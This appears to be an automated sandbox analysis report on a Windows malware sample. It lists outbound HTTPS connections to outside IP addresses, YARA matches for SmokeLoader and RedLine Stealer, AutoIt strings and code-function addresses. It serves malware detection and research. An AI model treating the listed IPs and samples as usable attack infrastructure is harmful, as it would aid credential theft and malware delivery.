Source: unknown	HTTPS traffic detected: 3.33.224.147:443 -> 192.168.2.4:51739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:52826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:52844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:52950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.59.243.225:443 -> 192.168.2.4:52839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.14.30.248:443 -> 192.168.2.4:52838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:52856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.4:52857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:52850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.37.42.12:443 -> 192.168.2.4:52858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.21.93.254:443 -> 192.168.2.4:52865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.190.63.111:443 -> 192.168.2.4:52855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:54507 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:52834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:54505 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.4:52891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.4:52840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.247.82.52:443 -> 192.168.2.4:52851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:59061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:59584 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:59725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:59803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:60176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:59583 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:59873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:59872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:60316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:59853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:60072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:60311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.224.147:443 -> 192.168.2.4:60315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:60539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.37.42.12:443 -> 192.168.2.4:60337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:60228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:60314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:60088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.37.42.12:443 -> 192.168.2.4:61801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:61775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:62472 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:63839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:63934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:64107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:64018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:64035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.37.42.12:443 -> 192.168.2.4:64401 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:64325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:64596 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:65394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:65444 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:65440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:64711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:65393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:65445 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:65392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.224.147:443 -> 192.168.2.4:49511 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:49930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:49527 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:50525 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:50710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:50871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:50641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:51040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.37.42.12:443 -> 192.168.2.4:51246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:51389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:51115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:52229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:52324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:51110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:56040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:56056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:54273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:56672 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:56665 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:56878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:56791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:57366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.224.147:443 -> 192.168.2.4:57618 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:57371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:57970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:57984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:58292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:58300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:58230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:58012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:58302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:59041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:59683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:60249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:60966 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.172.60:443 -> 192.168.2.4:61360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:61364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:61361 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:61366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:61385 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:62158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.4:62157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.238.144.219:443 -> 192.168.2.4:62869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:63405 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:63782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:63783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:63809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:63784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:65455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.63.248.47:443 -> 192.168.2.4:65454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:49559 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:63277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:65217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:53027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:53514 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:53934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:56853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:57327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:57545 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:57130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:58286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:58297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:58292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:59473 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:60152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:60873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:61508 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:61511 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:62203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:62889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:63277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:64363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:64588 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:65290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:65272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:50304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:51408 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:51655 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:52717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:53530 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:53772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:56437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:56691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.171.212.244:443 -> 192.168.2.4:57520 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.190.63.111:443 -> 192.168.2.4:50596 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0.3.file.exe.2af0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.vahvrsu.2c30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vahvrsu.2b30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.vahvrsu.2b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.8042.exe.4700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.8042.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vahvrsu.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.8042.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1737285169.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2439565285.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2369465159.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2048461979.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2104229521.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2105121877.0000000002BA0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.2424970399.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000019.00000002.2450588768.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.2285416255.000000000288F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.2425309073.0000000002C70000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: 38B4.exe, 00000006.00000000.2144291498.0000000000F95000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_be8de7be-d
Source: 38B4.exe, 00000006.00000000.2144291498.0000000000F95000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_636c964b-c
Source: Helper.exe, 00000018.00000000.2402605320.00007FF6A717B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6a2ae16e-b
Source: Helper.exe, 00000018.00000000.2402605320.00007FF6A717B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ead9a32a-5

.NET source code contains very large array initializations

Source: 7.2.41CD.exe.16c000.1.raw.unpack, -Module-.cs

Large array initialization: _003CModule_003E: array initializer size 2400

PE file contains section with special chars

Source: 4A1B.exe.1.dr	Static PE information: section name:
Source: 4A1B.exe.1.dr	Static PE information: section name:
Source: 4A1B.exe.1.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_001541FE	7_2_001541FE
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_00142280	7_2_00142280
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_00158B2E	7_2_00158B2E
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_00154B29	7_2_00154B29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00A30848	9_2_00A30848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00A30F71	9_2_00A30F71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00A31B68	9_2_00A31B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00A30838	9_2_00A30838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00A31B59	9_2_00A31B59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D80040	9_2_00D80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8D079	9_2_00D8D079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8F3E0	9_2_00D8F3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D83378	9_2_00D83378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D82848	9_2_00D82848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8C900	9_2_00D8C900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8BEC8	9_2_00D8BEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8336A	9_2_00D8336A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8B8F0	9_2_00D8B8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D89D80	9_2_00D89D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D89D6F	9_2_00D89D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_00D8BEB8	9_2_00D8BEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C97DE60	9_2_0C97DE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C972A28	9_2_0C972A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C971A68	9_2_0C971A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C97A500	9_2_0C97A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C9746B8	9_2_0C9746B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C9756C8	9_2_0C9756C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C970040	9_2_0C970040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 9_2_0C971A58	9_2_0C971A58
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_01770848	10_2_01770848
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_01771B68	10_2_01771B68
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_01770838	10_2_01770838
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_01771B59	10_2_01771B59
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097E0D18	10_2_097E0D18
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097EAD88	10_2_097EAD88
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097E6F78	10_2_097E6F78
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097E1E68	10_2_097E1E68
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097EE4E8	10_2_097EE4E8
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097EA680	10_2_097EA680
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097EE9DD	10_2_097EE9DD
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097EE9E0	10_2_097EE9E0
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Code function: 10_2_097ECE78	10_2_097ECE78
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_045447E4	13_2_045447E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04542A1C	13_2_04542A1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04541144	13_2_04541144
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04544DCC	13_2_04544DCC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_045447CD	13_2_045447CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04542588	13_2_04542588
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_045453C8	13_2_045453C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_045455A7	13_2_045455A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_045414A8	13_2_045414A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04671000	13_2_04671000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_046785F3	13_2_046785F3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_046787F0	13_2_046787F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04678AB0	13_2_04678AB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04676790	13_2_04676790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04676A60	13_2_04676A60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04677F40	13_2_04677F40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04678220	13_2_04678220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_046735E0	13_2_046735E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_04676DF0	13_2_04676DF0

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
